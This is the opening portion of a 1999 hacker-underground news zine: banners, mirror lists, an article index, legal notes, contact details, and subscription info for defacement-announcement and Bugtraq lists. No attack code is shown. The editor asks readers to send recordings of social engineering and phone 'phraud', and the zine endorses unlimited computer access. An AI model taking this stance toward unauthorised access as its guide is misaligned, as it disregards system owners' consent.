hwa-hn45
[63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
==========================================================================
= <=-[ HWA.hax0r.news ]-=> =
==========================================================================
[=HWA'99/2000=] Number 45 Volume 1 1999 Dec 5th 99
==========================================================================
[ 61:20:6B:69:64:20:63:6F:75: ]
[ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ]
[ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ]
==========================================================================
"This newsletter/ezine has been Declassified for the phearing impaired"
____
/ ___|_____ _____ _ __ __ _ __ _ ___
| | / _ \ \ / / _ \ '__/ _` |/ _` |/ _ \
| |__| (_) \ V / __/ | | (_| | (_| | __/
\____\___/ \_/ \___|_| \__,_|\__, |\___|
|___/
This is #45 covering Nov 28th to Dec 5th.
==========================================================================
"ABUSUS NON TOLLIT USUM"
==========================================================================
Mailing list members: 447 Can we bump this up somewhat? spread the word!
==========================================================================
Today the spotlight may be on you, some interesting machines that
have accessed these archives recently...
_ _ _
| | | | ___ | |_
| |_| |/ _ \| __|
| _ | (_) | |_
|_| |_|\___/ \__|
_ _ _ _
| | | (_) |
| |__| |_| |_ ___
| __ | | __/ __|
| | | | | |_\__ \
|_| |_|_|\__|___/
.gov and .mil activity
There are some interesting machines among these, the *.nosc.mil boxes are
from SPAWAR information warfare centres, good to see our boys keeping up
with the news... - Ed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ ___ ___ _ ___
| | | \ \ / / \ | |__ __ ___ __/ _ \ _ __ _ __ _____ _____
| |_| |\ \ /\ / / _ \ | '_ \ / _` \ \/ / | | | '__| '_ \ / _ \ \ /\ / / __|
| _ | \ V V / ___ \ _| | | | (_| |> <| |_| | |_ | | | | __/\ V V /\__ \
|_| |_| \_/\_/_/ \_(_)_| |_|\__,_/_/\_\\___/|_(_)|_| |_|\___| \_/\_/ |___/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
http://welcome.to/HWA.hax0r.news/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
# #
@ The HWA website is sponsored by CUBESOFT communications I highly @
# recommend you consider these people for your web hosting needs, #
@ @
# Web site sponsored by CUBESOFT networks http://www.csoft.net #
@ check them out for great fast web hosting! @
# #
# http://www.csoft.net/~hwa @
@ #
@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_ _ _ _ _____ _ _ _
| | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___
| |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __|
| _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__
|_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___|
Sadly, due to the traditional ignorance and sensationalizing of the mass
media, the once-noble term hacker has become a pejorative.
Among true computer people, being called a hacker is a compliment. One of
the traits of the true hacker is a profoundly antibureaucratic and
democratic spirit. That spirit is best exemplified by the Hacker's Ethic.
This ethic was best formulated by Steven Levy in his 1984 book Hackers:
Heroes of the Computer Revolution. Its tenets are as follows:
1 - Access to computers should be unlimited and total.
2 - All information should be free.
3 - Mistrust authority - promote decentralization.
4 - Hackers should be judged by their hacking not bogus criteria such as
degrees, age, race, or position.
5 - You create art and beauty on a computer,
6 - Computers can change your life for the better.
The Internet as a whole reflects this ethic.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
_____ _ _ _
| ___|__ _ __ _ __ ___ __ _| |_| |_(_)_ __ __ _
| |_ / _ \| '__| '_ ` _ \ / _` | __| __| | '_ \ / _` |
| _| (_) | | | | | | | | (_| | |_| |_| | | | | (_| |
|_| \___/|_| |_| |_| |_|\__,_|\__|\__|_|_| |_|\__, |
|___/
A Comment on FORMATTING:
Oct'99 - Started 80 column mode format, code is still left
untouched since formatting will destroy syntax.
I received an email recently about the formatting of this
newsletter, suggesting that it be formatted to 75 columns
in the past I've endeavoured to format all text to 80 cols
except for articles and site statements and urls which are
posted verbatim, I've decided to continue with this method
unless more people complain, the zine is best viewed in
1024x768 mode with UEDIT.... - Ed
BTW if anyone can suggest a better editor than UEDIT for
this thing send me some email i'm finding it lacking in
certain areas. Must be able to produce standard ascii.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
__ __ _
| \/ (_)_ __ _ __ ___ _ __ ___
| |\/| | | '__| '__/ _ \| '__/ __|
| | | | | | | | | (_) | | \__ \
|_| |_|_|_| |_| \___/|_| |___/
New mirror sites
*** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ ***
http://datatwirl.intranova.net * NEW *
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://net-security.org/hwahaxornews
http://www.sysbreakers.com/hwa
http://www.attrition.org/hosted/hwa/
http://www.ducktank.net/hwa/issues.html.
http://hwazine.cjb.net/
http://www.hackunlimited.com/files/secu/papers/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
* http://hwa.hax0r.news.8m.com/
* http://www.fortunecity.com/skyscraper/feature/103/
* Crappy free sites but they offer 20M & I need the space...
** Some issues are not located on these sites since they exceed
the file size limitations imposed by the sites :-( please
only use these if no other recourse is available.
*** Most likely to be up to date other than the main site.
HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net
thanks to airportman for the Cubesoft bandwidth. Also shouts out to all
our mirror sites! and p0lix for the (now expired) digitalgeeks archive
tnx guys.
http://www.csoft.net/~hwa
HWA.hax0r.news Mirror Sites:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa. *DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.projectgamma.com/archives/zines/hwa/
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=
____ _
/ ___| _ _ _ __ ___ _ __ ___(_)___
\___ \| | | | '_ \ / _ \| '_ \/ __| / __|
___) | |_| | | | | (_) | |_) \__ \ \__ \
|____/ \__, |_| |_|\___/| .__/|___/_|___/
|___/ |_|
SYNOPSIS (READ THIS)
--------------------
The purpose of this newsletter is to 'digest' current events of interest
that affect the online underground and netizens in general. This includes
coverage of general security issues, hacks, exploits, underground news
and anything else I think is worthy of a look see. (remember i'm doing
this for me, not you, the fact some people happen to get a kick/use
out of it is of secondary importance).
This list is NOT meant as a replacement for, nor to compete with, the
likes of publications such as CuD or PHRACK or with news sites such as
AntiOnline, the Hacker News Network (HNN) or mailing lists such as
BUGTRAQ or ISN nor could any other 'digest' of this type do so.
It *is* intended however, to complement such material and provide a
reference to those who follow the culture by keeping tabs on as many
sources as possible and providing links to further info, it's a labour
of love and will be continued for as long as I feel like it, i'm not
motivated by dollars or the illusion of fame, did you ever notice how
the most famous/infamous hackers are the ones that get caught? there's
a lot to be said for remaining just outside the circle... <g>
@HWA
=-----------------------------------------------------------------------=
Welcome to HWA.hax0r.news ... #44
=-----------------------------------------------------------------------=
We could use some more people joining the channel, it's usually pretty
quiet, we don't bite (usually) so if you're hanging out on irc stop
by and idle a while and say hi...
**************************************************************************
____| _| |
__| | __ \ _ \ __|
| __| | | __/ |
_____|_| _| _|\___|\__|
Eris Free Net #HWA.hax0r.news
**************************************************************************
*** /join #HWA.hax0r.news on EFnet the key is `zwen' when keyed ***
*** ***
*** please join to discuss or impart news on from the zine and around ***
*** the zine or just to hang out, we get some interesting visitors you ***
*** could be one of em. ***
*** ***
*** Note that the channel isn't there to entertain you its purpose is ***
*** to bring together people interested and involved in the underground***
*** to chat about current and recent events etc, do drop in to talk or ***
*** hangout. Also if you want to promo your site or send in news tips ***
*** its the place to be, just remember we're not #hack or #chatzone... ***
**************************************************************************
=--------------------------------------------------------------------------=
_____ _ _
/ ____| | | | |
| | ___ _ __ | |_ ___ _ __ | |_ ___
| | / _ \| '_ \| __/ _ \ '_ \| __/ __|
| |___| (_) | | | | || __/ | | | |_\__ \
\_____\___/|_| |_|\__\___|_| |_|\__|___/
=--------------------------------------------------------------------------=
[ INDEX ]
=--------------------------------------------------------------------------=
Key Intros
=--------------------------------------------------------------------------=
00.0 .. COPYRIGHTS ......................................................
00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC .......................
00.2 .. SOURCES .........................................................
00.3 .. THIS IS WHO WE ARE ..............................................
00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?..........................
00.5 .. THE HWA_FAQ V1.0 ................................................
ABUSUS NON TOLLIT USUM?
This is (in case you hadn't guessed) Latin, and loosely translated
it means "Just because something is abused, it should not be taken
away from those who use it properly". This is our new motto.
=--------------------------------------------------------------------------=
Key Content
=--------------------------------------------------------------------------=
01.0 .. GREETS ..........................................................
01.1 .. Last minute stuff, rumours, newsbytes ...........................
01.2 .. Mailbag .........................................................
02.0 .. From the Editor..................................................
03.0 .. Yes It Is (Worth It) ............................................
04.0 .. ExplorerZip Shrinks, Becomes MiniZip ............................
05.0 .. Staples Files Suit Against Unknown Defacer ......................
06.0 .. Comet bows to consumer pressure..................................
07.0 .. Personal Info of Canadian ISP Users Leaked ......................
08.0 .. First Internet Piracy Case in Japan .............................
09.0 .. FBI Launches InfraGuard in Ohio .................................
10.0 .. National Gun Database Goes Online ...............................
11.0 .. Zero Knowledge Ships Freedom, Finally ...........................
12.0 .. OpenBSD 2.6 Ships ...............................................
13.0 .. Videon Was Warned of Data Loss ..................................
14.0 .. German Digital Signature Chip Broke .............................
15.0 .. IETF Members Under Investigation For Treason ....................
16.0 .. Jane's Releases Cyberterrorism Report ...........................
17.0 .. Car Radio Listening Habits Being Gathered .......................
18.0 .. CVE by Mitre Goes Online ........................................
19.0 .. Novell Head Victim of Online Credit Card Theft ..................
20.0 .. IDC Says E-Commerce Unsafe Most of the Time .....................
21.0 .. Attack Trees Help to Model Security Threats .....................
22.0 .. Pandora Updated .................................................
23.0 .. [sSh] Busted or Not? ...........................................
24.0 .. Response to Freedom Extraordinary ...............................
25.0 .. DCypher.net Team Created ........................................
26.0 .. Hackers Make it to Mars .........................................
27.0 .. Security Focus newsletter #17....................................
28.0 .. SQL 7 "Magic Packet" DoS.........................................
=-------------------------------------------------------------------------------=
AD.S .. Post your site ads or etc here, if you can offer something in return
thats tres cool, if not we'll consider ur ad anyways so send it in.
ads for other zines are ok too btw just mention us in yours, please
remember to include links and an email contact. Corporate ads will
be considered also and if your company wishes to donate to or
participate in the upcoming Canc0n99 event send in your suggestions
and ads now...n.b date and time may be pushed back join mailing list
for up to date information.......................................
Current dates: POSTPONED til further notice, place: TBA..........
Ha.Ha .. Humour and puzzles ............................................
Hey You!........................................................
=------=........................................................
Send in humour for this section! I need a laugh and its hard to
find good stuff... ;)...........................................
SITE.1 .. Featured site, .................................................
H.W .. Hacked Websites ...............................................
A.0 .. APPENDICES......................................................
A.1 .. PHACVW linx and references......................................
=--------------------------------------------------------------------------=
@HWA'99
00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _
| | ___ __ _ __ _| |
| | / _ \/ _` |/ _` | |
| |__| __/ (_| | (_| | |
|_____\___|\__, |\__,_|_|
|___/
THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE
OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO
WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT
(LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST
READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ).
Important semi-legalese and license to redistribute:
YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF
AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE
ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED
IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE
APPRECIATED the current link is http://welcome.to/HWA.hax0r.news
IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK
ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL
ME PRIVATELY current email cruciphux@dok.org
THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL
WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL
THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS:
I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE
AND REDISTRIBUTE/MIRROR. - EoD
Although this file and all future issues are now copyright, some of
the content holds its own copyright and these are printed and
respected. News is news so i'll print any and all news but will quote
sources when the source is known, if its good enough for CNN its good
enough for me. And i'm doing it for free on my own time so pfffft. :)
No monies are made or sought through the distribution of this material.
If you have a problem or concern email me and we'll discuss it.
cruciphux@dok.org
Cruciphux [C*:.]
00.1 CONTACT INFORMATION AND MAIL DROP
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _
/ ___|___ _ __ | |_ __ _ ___| |_ ___
| | / _ \| '_ \| __/ _` |/ __| __/ __|
| |__| (_) | | | | || (_| | (__| |_\__ \
\____\___/|_| |_|\__\__,_|\___|\__|___/
Wahoo, we now have a mail-drop, if you are outside of the U.S.A or
Canada / North America (hell even if you are inside ..) and wish to
send printed matter like newspaper clippings a subscription to your
cool foreign hacking zine or photos, small non-explosive packages
or sensitive information etc etc well, now you can. (w00t) please
no more inflatable sheep or plastic dog droppings, or fake vomit
thanks.
Send all goodies to:
HWA NEWS
P.O BOX 44118
370 MAIN ST. NORTH
BRAMPTON, ONTARIO
CANADA
L6V 4H5
WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are
~~~~~~~ reading this from some interesting places, make my day and get a
mention in the zine, send in a postcard, I realize that some places
it is cost prohibitive but if you have the time and money be a cool
dude / gal and send a poor guy a postcard preferably one that has some
scenery from your place of residence for my collection, I collect stamps
too so you kill two birds with one stone by being cool and mailing in a
postcard, return address not necessary, just a "hey guys being cool in
Bahrain, take it easy" will do ... ;-) thanx.
Ideas for interesting 'stuff' to send in apart from news:
- Photo copies of old system manual front pages (optionally signed by you) ;-)
- Photos of yourself, your mom, sister, dog and or cat in a NON
compromising position plz I don't want pr0n. <g>
- Picture postcards
- CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250
tapes with hack/security related archives, logs, irc logs etc on em.
- audio or video cassettes of yourself/others etc of interesting phone
fun or social engineering examples or transcripts thereof.
Stuff you can email:
- Prank phone calls in .ram or .mp* format
- Fone tones and security announcements from PBX's etc
- fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities)
- reserved for one smiley face -> :-) <-
- PHACV lists of files that you have or phac cd's you own (we have a burner, *g*)
- burns of phac cds (email first to make sure we don't already have em)
- Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp*
If you still can't think of anything you're probably not that interesting
a person after all so don't worry about it <BeG>
Our current email:
Submissions/zine gossip.....: hwa@press.usmc.net
Private email to editor.....: cruciphux@dok.org
Distribution/Website........: sas2@usa.net
@HWA
00.2 Sources ***
~~~~~~~~~~~
____
/ ___| ___ _ _ _ __ ___ ___ ___
\___ \ / _ \| | | | '__/ __/ _ Y __|
___) | (_) | |_| | | | (_| __|__ \
|____/ \___/ \__,_|_| \___\___|___/
Sources can be some, all, or none of the following (by no means complete
nor listed in any degree of importance) Unless otherwise noted, like msgs
from lists or news from other sites, articles and information is compiled
and or sourced by Cruciphux no copyright claimed.
News & I/O zine ................. http://www.antionline.com/
Back Orifice/cDc..................http://www.cultdeadcow.com/
News site (HNN) ..................http://www.hackernews.com/
Help Net Security.................http://net-security.org/
News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/
NewsTrolls .(daily news ).........http://www.newstrolls.com/
News + Exploit archive ...........http://www.rootshell.com/beta/news.html
CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest
News site+........................http://www.zdnet.com/
News site+Security................http://www.gammaforce.org/
News site+Security................http://www.projectgamma.com/
News site+Security................http://securityhole.8m.com/
News site+Security related site...http://www.403-security.org/
News/Humour site+ ................http://www.innerpulse.com
News/Techie news site.............http://www.slashdot.org
+Various mailing lists and some newsgroups, such as ...
+other sites available on the HNN affiliates page, please see
http://www.hackernews.com/affiliates.html as they seem to be popping up
rather frequently ...
http://www.the-project.org/ .. IRC list/admin archives
http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk
alt.hackers.malicious
alt.hackers
alt.2600
BUGTRAQ
ISN security mailing list
ntbugtraq
<+others>
NEWS Agencies, News search engines etc:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.cnn.com/SEARCH/
http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0
http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack
http://www.ottawacitizen.com/business/
http://search.yahoo.com.sg/search/news_sg?p=hack
http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack
http://www.zdnet.com/zdtv/cybercrime/
http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column)
NOTE: See appendices for details on other links.
http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm
http://freespeech.org/eua/ Electronic Underground Affiliation
http://ech0.cjb.net ech0 Security
http://axon.jccc.net/hir/ Hackers Information Report
http://net-security.org Net Security
http://www.403-security.org Daily news and security related site
Submissions/Hints/Tips/Etc
~~~~~~~~~~~~~~~~~~~~~~~~~~
____ _ _ _
/ ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___
\___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|
___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \
|____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/
All submissions that are `published' are printed with the credits
you provide, if no response is received by a week or two it is assumed
that you don't care whether the article/email is to be used in an issue
or not and may be used at my discretion.
Looking for:
Good news sites that are not already listed here OR on the HNN affiliates
page at http://www.hackernews.com/affiliates.html
Magazines (complete or just the articles) of breaking sekurity or hacker
activity in your region, this includes telephone phraud and any other
technological use, abuse hole or cool thingy. ;-) cut em out and send it
to the drop box.
- Ed
Mailing List Subscription Info (Far from complete) Feb 1999
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~
ISS Security mailing list faq : http://www.iss.net/iss/maillist.html
ATTRITION.ORG's Website defacement mirror and announcement lists
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.attrition.org/mirror/attrition/
http://www.attrition.org/security/lists.html
--
defaced [web page defacement announce list]
This is a public LOW VOLUME (1) mail list to circulate news/info on
defaced web sites. To subscribe to Defaced, send mail to
majordomo@attrition.org with "subscribe defaced" in the BODY of
the mail.
There will be two types of posts to this list:
1. brief announcements as we learn of a web defacement.
this will include the site, date, and who signed the
hack. we will also include a URL of a mirror of the hack.
2. at the end of the day, a summary will be posted
of all the hacks of the day. these can be found
on the mirror site listed under 'relevant links'
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: mcintyre@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
(1) It is low volume on a normal day. On days of many defacements,
traffic may be increased. On a few days, it is a virtual mail
flood. You have been warned. ;)
-=-
--
defaced summary [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced domains on a given day. To subscribe to Defaced-Summary, send mail to
majordomo@attrition.org with "subscribe defaced-summary" in the BODY of
the mail.
There will be ONE type of post to this list:
1. a single nightly piece of mail listing all reported
domains. the same information can be found on
http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
defaced GM [web page defacement announce list]
This is a low traffic mail list to announce all publicly
defaced government and military domains on a given day. To subscribe to
Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm"
in the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personnel charged with tracking security incidents on
government run networks.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
--
defaced alpha [web page defacement announce list]
This is a low traffic mail list to announce via alpha-numeric
pagers, all publicly defaced government and military domains
on a given day. To subscribe to Defaced-Alpha, send mail to
majordomo@attrition.org with "subscribe defaced-alpha" in
the BODY of the mail.
There will be ONE type of post to this list:
1. sporadic pieces of mail for each government (.gov)
or military (.mil) system defaced. the information
will only include domain names. the same information
can be found on http://www.attrition.org/mirror/attrition/
via sporadic updates.
This list is designed primarily for government and military
personnel charged with tracking security incidents on
government run networks. Further, it is designed for
quick response and aimed at law enforcement agencies like
DCIS and the FBI.
To subscribe to this list, a special mail will be sent to YOUR
alpha-numeric pager. A specific response must be made within
12 hours of receiving the mail to be subscribed. If the response
is not received, it is assumed the mail was not sent to your
pager.
This list is for informational purposes only. Subscribing
denotes your acceptance of the following:
1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these
hacks.
4. all of the points on the disclaimer listed below.
Under no circumstances may the information on this list be used
to solicit security business. You do not have permission to forward
this mail to anyone related to the domain that was defaced.
enjoy.
List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org
Relevant Links:
Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
ATTRITION Mirror: http://www.attrition.org/mirror/
-=-
THE MOST READ:
BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~
What is Bugtraq?
Bugtraq is a full-disclosure UNIX security mailing list, (see the info
file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to
bugtraq, send mail to listserv@netspace.org containing the message body
subscribe bugtraq. I've been archiving this list on the web since late
1993. It is searchable with glimpse and archived on-the-fly with hypermail.
Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html
About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following comes from Bugtraq's info file:
This list is for *detailed* discussion of UNIX security holes: what they are,
how to exploit, and what to do to fix them.
This list is not intended to be about cracking systems or exploiting their
vulnerabilities. It is about defining, recognizing, and preventing use of
security holes and risks.
Please refrain from posting one-line messages or messages that do not contain
any substance that can relate to this list`s charter.
I will allow certain informational posts regarding updates to security tools,
documents, etc. But I will not tolerate any unnecessary or nonessential "noise"
on this list.
Please follow the below guidelines on what kind of information should be posted
to the Bugtraq list:
+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security organizations
+ Incident advisories or informational reporting
Any non-essential replies should not be directed to the list but to the originator of the message. Please do not
"CC" the bugtraq reflector address if the response does not meet the above criteria.
Remember: YOYOW.
You own your own words. This means that you are responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside the distribution of this list may be
challenged by you, the author.
For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)
UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I am pleased to inform you of several changes that will be occurring
on June 5th. I hope you find them as exciting as I do.
BUGTRAQ moves to a new home
---------------------------
First, BUGTRAQ will be moving from its current home at NETSPACE.ORG
to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read
below. Other than the change of domains nothing of how the list
is run changes. I am still the moderator. We play by the same rules.
Security Focus will be providing mail archives for BUGTRAQ. The
archives go back longer than Netspace's and are more complete than
Geek-Girl's.
The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options
will be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming
mail into mail folders by examining the From address will have to
update them to include the new address. The new address will be:
BUGTRAQ@SECURITYFOCUS.COM
Security Focus will also be providing a free searchable vulnerability
database.
BUGTRAQ es muy bueno
--------------------
It has also become apparent that there is a need for forums
in the spirit of BUGTRAQ where non-English speaking people
or people that don't feel comfortable speaking English can
exchange information.
As such I've decided to give BUGTRAQ in other languages a try.
BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other
language you can give the other lists a try. All relevant information
from the other lists which have not already been covered here
will be translated and forwarded on by the list moderator.
In the next couple of weeks we will be introducing BUGTRAQ-JP
(Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp>
and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A.
from Argentina <http://www.core-sdi.com/> (the folks that brought you
Secure Syslog and the SSH insertion attack).
What is Security Focus?
-----------------------
Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same
time providing a comprehensive source of security information. Aside
from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl
herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If
you are interested in viewing the staff pages, please see the 'About'
section on www.securityfocus.com.
On the community creating front you will find a set of forums
and mailing lists we hope you will find useful. A number of them
are not scheduled to start for several weeks but starting today
the following list is available:
* Incidents' Mailing List. BUGTRAQ has always been about the
discussion of new vulnerabilities. As such I normally don't approve
messages about break-ins, trojans, viruses, etc with the exception
of wide spread cases (Melissa, ADM worm, etc). The other choice
people are usually left with is email CERT but this fails to
communicate this important information to other that may be
potentially affected.
The Incidents mailing list is a lightly moderated mailing list to
facilitate the quick exchange of security incident information.
Topical items include such things as information about rootkits
new trojan horses and viruses, source of attacks and tell-tale
signs of intrusions.
To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBS INCIDENTS FirstName, LastName
Shortly we'll also be introducing an Information Warfare forum along
with ten other forums over the next two months. These forums will be
built and moderated by people in the community as well as vendors who
are willing to take part in the community building process.
*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online communities.
If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.
On the information resource front you find a large database of
the following:
* Vulnerabilities. We are making accessible a free vulnerability
database. You can search it by vendor, product and keyword. You
will find detailed information on the vulnerability and how to fix it,
as well are links to reference information such as email messages,
advisories and web pages. You can search by vendor, product and
keywords. The database itself is the result of culling through 5
years of BUGTRAQ plus countless other lists and news groups. It's
a shining example of how thorough full disclosure has made a significant
impact on the industry over the last half decade.
* Products. An incredible number of categorized security products
from over two hundred different vendors.
* Services. A large and focused directory of security services offered by
vendors.
* Books, Papers and Articles. A vast number of categorized security
